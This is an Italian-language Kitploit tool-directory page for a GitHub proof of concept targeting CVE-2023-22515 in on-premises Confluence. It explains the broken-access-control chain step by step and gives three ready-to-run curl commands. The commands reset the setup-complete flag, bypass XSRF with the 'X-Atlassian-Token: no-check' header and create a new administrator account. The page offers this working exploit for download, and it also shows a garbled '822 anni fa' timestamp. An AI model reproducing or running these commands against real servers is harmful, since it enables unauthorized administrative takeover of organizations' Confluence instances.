Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-22515-POC — PoC per CVE-2023-22515 | Kitploit
Strumenti/GitHubGitHub/j3seer/cve-2023-22515-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingRed Teaming
GitHubj3seer/cve-2023-22515-poc

CVE-2023-22515-POC

PoC per CVE-2023-22515

Vedi Repository
822 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-22515

CVE-2023-22515, una vulnerabilità critica che colpisce le istanze on-premises di Confluence Server e Confluence Data Center, è una vulnerabilità di Broken Access Control. Attlassian ha fornito un punteggio base CVSS di 10.0

Exploit

Breve spiegazione:

1- A causa di come gli interceptor Xwork analizzano i parametri, /test.action?one=a equivale a setOne()='a'; alternativamente /test.action?one.two=a equivale a getOne().setTwo()="a"

2- Gli endpoint /setup/* includono una chiamata @ParameterSafe che ci permette di usare set e get come in /setup/setupdb.action?dbConfigInfo.databaseType=postgresql, tuttavia, poiché gli endpoint /setup/* sono bloccati perché la configurazione è completa, è possibile usare /server-info.action

3- Trova il metodo set per completare la configurazione => getBootstrapStatusProvider().getApplicationConfig().setSetupComplete(false);

4- Usa l'header "X-Atlassian-Token" per bypassare XSRF

root@kitploit:~
curl http://localhost/server-info.action\?bootstrapStatusProvider.applicationConfig.setupComplete\=false\; 

curl -X POST -H "X-Atlassian-Token: no-check" -d "username=haxor&fullName=leet&[email protected]&password=leet&confirm=leet&setup-next-button=Next" http://localhost/setup/setupadministrator.action\; 

curl -X POST -H "X-Atlassian-Token: no-check" http://localhost/setup/finishsetup.action

Riferimenti

DISCLAIMER: L'exploit non è stato scoperto o realizzato da me; il merito va agli articoli qui sotto

https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis

https://blog.s1r1us.ninja/research/brokenconflu

Scarica lo strumento